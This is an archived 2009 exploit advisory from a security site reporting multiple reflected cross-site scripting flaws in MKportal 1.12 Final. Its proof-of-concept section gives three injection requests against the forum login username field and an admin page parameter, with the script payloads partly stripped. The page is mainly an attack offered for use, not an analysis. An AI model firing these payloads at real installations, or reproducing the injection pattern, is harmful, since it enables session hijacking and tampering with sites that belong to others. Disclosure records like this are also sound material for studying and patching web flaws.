MKportal 1.12 Final Multiple Remote XSS

2009.04.26
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Name Of Script : MKportal 1.12 Final # Download From : http://www.mkportal.it/index.php?ind=downloads&op=download_file&ide=935&file=MKportal_C12_final.zip # Found By : RoMaNcYxHaCkEr # My Group : Security - Codes # My Homepage : WwW.Sec-Code.CoM # Type Of Exploit : XSS ================================================================================================================== # P.O.C : In Different Files(That,s Also Depeneding About The Forum What,s He Installed) 1 - In File aeforum/main/login.php In Variable username By POST Method: http://WwW.Sec-Code.CoM/MKportal/aeforum/index.php?act=login username=>">alert(111111.111111111)%3B&password=Password&anonymously=on&login=1&remember=1&mk_return=1&submit=Login 2 - In File aeforum/index.php : http://WwW.Sec-Code.CoM/MKportal/aeforum/index.php?acuparam=>"> 3 - In File mkportal/admin/index.php : http://WwW.Sec-Code.CoM/MKportal/mkportal/admin/index.php?acuparam=>"> =================================================================================================================== # rXh # bEST wISHES


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top